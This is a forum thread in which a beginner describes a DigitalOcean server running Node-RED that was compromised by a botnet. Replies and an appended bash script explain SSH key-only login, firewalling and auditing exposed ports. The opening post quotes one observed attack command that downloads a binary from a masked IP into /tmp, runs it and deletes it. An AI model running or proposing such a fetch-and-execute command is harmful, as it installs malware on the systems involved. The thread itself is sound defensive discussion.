Server hacked - is Node-Red an entry point and how to prevent this?

Hi community,
My server running on Digitalocean has been hacked around October, most likely by a bot net (google: . This thing is used for DDoS as far as I understand, but you never know what else has been changed...

I realized because I saw many commands similar to the one below in the command line:
"cd /tmp; curl -o php http://XX.XX.XX.XX/a-r.m-6.ISIS ; chmod +x php; ./php; rm -rf php"
If you saw things like this, you have also been hacked. It seems like I have not been the only one, especially in the Node-Red community:

URLhaus | Checking your browser seems to be DO specific problem or for node-red users?
Openhab Servers potential target for attacs - hack - openHAB Community

Could it be that hackers just looked for an entry point by scanning Node-RED ports?

So I am a beginner in IT like many others here, and the topics I found on this forum are in my view rather professional level. Digitalocean told me to scrap the instance, which I will do, but it's a major pain since I run node-red, Grafana, InfluxDB etc. on it, so setting it all up again is a good day+ of work.

My questions since I am rather new to IT security:

  • Can anyone recommend an entry level guide to IT security on hosted servers like Digitalocean where I don't need to spend days to understand the keywords and what I need to do?
  • Digitalocean wrote me that: "your Droplet does have password authentication enabled. Password-based authentication lacks a strong identity check and no one wants hackers to launch a brute force attack to hack into your server, so it's a good practice to disable password authentication in the OpenSSH server. " Doesn't make sense to me, can someone explain that? I understand the brute force part but wouldn't it make more sense to just have a very complex password instead of having none?
  • Sorry, very beginner question, but I read in this forum that it's dangerous to leave a port open. On a hosted server with node-red running, what does it mean to open and close a port?
  • Digitalocean recommended using clamAV and the freshclam library, but then again I couldn't do it because it said "database load killed by Signal 9", which could mean that my instance has not enough RAM to execute that. Has anyone had and overcome this problem?

Many thanks here, it seems that around last October a rather large attack was happening and I guess many early users like me aren't aware that this happened. Would be great to have a simple guide on how to avoid this to have it never happen again.
Jacob

Short answer is that it is quite difficult to run your own secure cloud server and it is not something a beginner should do.

There is plenty of guidance on the forum, in the docs and elsewhere about running node-red securely when open to the Internet.

But this isn't really a Node-RED issue as such. Nobody should be opening up a service or server to the Internet without knowing what they are doing, it is a recipe for disaster.

You should now rebuild your Pi from scratch since you don't know what the attackers have done to it.

In the future, make sure you understand the consequences and requirements of setting up an Internet-facing service before starting.

No. You DO need to spend days understanding things.

A stronger password is better than a weak one of course. But they are suggesting that you use certificate-based SSH authentication which is much stronger still.

TCP/IP is the protocol for networking over the Internet. It uses addresses and ports to identify channels of communication. Many common services have standard ports. For example, the web (HTTP/HTTPS) typically uses Port 80 for HTTP and Port 443 for HTTPS.

You can use a local firewall on a Droplet to ensure that only specific ports are open. You could also use it to change default ports. For example, SSH runs on Port 22 but an internet-facing service will start being attacked on that port within seconds of appearing on the Internet - so better to change the externally facing port to something else.

AV = Anti-Virus. Good for protecting the data files on your server but not much else.

Some of what you need to know is contained in this FAQ post, containing advice on how to safely access node-red over the internet.
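The two points in the reply above that a beginner can actually act on are the SSH password question and the "open port" question. The script below is an added example written for this thread, not code from the original post or from the Node-RED project. It audits both (is sshd still accepting passwords, and which listeners are reachable from the Internet) against constructed sample inputs, and carries the remediation commands behind an explicit `--apply` flag. The paths `/etc/ssh/sshd_config.d/`, the `ssh` service name and the use of `ufw` are assumptions for an Ubuntu/Debian Droplet.

```shell
#!/usr/bin/env bash
# Added example for this thread (not code from the original post or from the
# Node-RED project). Two audits that map onto the reply above: is sshd still
# accepting passwords, and which ports does the host expose to the Internet.
# All sample inputs are constructed; paths and service names are assumptions
# for Ubuntu/Debian droplets.
set -u

# sshd keeps the FIRST value it reads for a keyword. Ubuntu's sshd_config starts
# with "Include /etc/ssh/sshd_config.d/*.conf", so a drop-in there beats a later
# line in the main file. This mimics that rule on one flattened config on stdin
# (or on the output of "sshd -T", which prints the effective settings).
# KEY may be "a|b" for keyword aliases. Match blocks and Key=Value syntax are ignored.
sshd_effective() {
    awk -v key="$1" '
        /^[[:space:]]*#/ || /^[[:space:]]*$/ { next }
        !found && tolower($1) ~ ("^(" tolower(key) ")$") { print tolower($2); found = 1 }
        END { if (!found) print "default" }'
}

# Reads an sshd config on stdin, prints findings, returns 0 only when no
# password path into the box remains (the setting DigitalOcean was pointing at).
sshd_audit() {
    local cfg bad=0 v
    cfg=$(cat)
    v=$(printf '%s\n' "$cfg" | sshd_effective PasswordAuthentication)
    if [ "$v" != "no" ]; then echo "FAIL PasswordAuthentication=$v (want no)"; bad=1; fi
    # With UsePAM, keyboard-interactive is a second password prompt; disable it too.
    v=$(printf '%s\n' "$cfg" | sshd_effective 'KbdInteractiveAuthentication|ChallengeResponseAuthentication')
    if [ "$v" != "no" ]; then echo "FAIL KbdInteractiveAuthentication=$v (want no)"; bad=1; fi
    v=$(printf '%s\n' "$cfg" | sshd_effective PubkeyAuthentication)
    if [ "$v" = "no" ]; then echo "FAIL PubkeyAuthentication=no (you would lock yourself out)"; bad=1; fi
    v=$(printf '%s\n' "$cfg" | sshd_effective PermitRootLogin)
    if [ "$v" = "yes" ]; then echo "WARN PermitRootLogin=yes (use prohibit-password)"; bad=1; fi
    if [ "$bad" -eq 0 ]; then echo "OK sshd accepts keys only"; fi
    return "$bad"
}

# Constructed: a stock config where password auth is only commented out (= default yes).
WEAK_SSHD='#PasswordAuthentication yes
PermitRootLogin yes
KbdInteractiveAuthentication yes'

# Constructed: drop-in plus main file, flattened. The later "yes" is ignored: first wins.
HARD_SSHD='PasswordAuthentication no
KbdInteractiveAuthentication no
PermitRootLogin prohibit-password
PasswordAuthentication yes'

# "Open port" on a droplet = a listener bound to every address (0.0.0.0, *, [::])
# on a port the firewall lets through. Feed it "ss -tlnH" output plus an allow-list;
# it prints the wildcard listeners that should be firewalled or rebound to 127.0.0.1
# and reached through an SSH tunnel (Node-RED 1880, Grafana 3000, InfluxDB 8086).
exposed_ports() {
    awk -v allow=" $1 " '
        { n = split($4, a, ":"); port = a[n]; addr = substr($4, 1, length($4) - length(port) - 1)
          if ((addr == "0.0.0.0" || addr == "*" || addr == "[::]") && index(allow, " " port " ") == 0 && !seen[port]++) print port }'
}

# Constructed "ss -tlnH" output: SSH, Node-RED and Grafana on all interfaces, InfluxDB local only.
SAMPLE_SS='LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 128 [::]:22 [::]:*
LISTEN 0 511 *:1880 *:*
LISTEN 0 4096 127.0.0.1:8086 0.0.0.0:*
LISTEN 0 4096 0.0.0.0:3000 0.0.0.0:*'

# The fix itself. Only runs as "./harden.sh --apply" as root, AFTER your public key
# is in ~/.ssh/authorized_keys and a second key-based session is open, so you cannot
# lock yourself out. Assumes OpenSSH >= 8.2 (sshd_config.d) and ufw installed.
apply_hardening() {
    printf '%s\n' 'PasswordAuthentication no' 'KbdInteractiveAuthentication no' \
        'PermitRootLogin prohibit-password' > /etc/ssh/sshd_config.d/10-keys-only.conf
    sshd -t && systemctl reload ssh     # validate first; reload keeps existing sessions open
    ufw default deny incoming           # every port is closed unless listed below
    ufw limit 22/tcp                    # allow SSH, rate-limited against brute force
    ufw allow 443/tcp                   # only if you front Node-RED with TLS on 443
    ufw --force enable
}

if [ "${1:-}" = "--apply" ]; then
    apply_hardening
elif [ "${1:-}" = "--audit" ]; then
    sshd -T 2>/dev/null | sshd_audit    # needs root; -T prints the effective config
    ss -tlnH | exposed_ports "22 443"
fi
```

Run it with `--audit` on the Droplet to see what the audit flags; run the constructed samples through `sshd_audit` and `exposed_ports` to see what a weak and a hardened host look like. For the services the audit lists, bind them to loopback instead of relying on the firewall alone (Node-RED's `settings.js` has `uiHost: "127.0.0.1"` for this) and reach them over `ssh -L 1880:127.0.0.1:1880 user@droplet`. DigitalOcean's cloud firewall can enforce the same allow-list in front of the Droplet, which also covers the case where `ufw` is later disabled by mistake.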
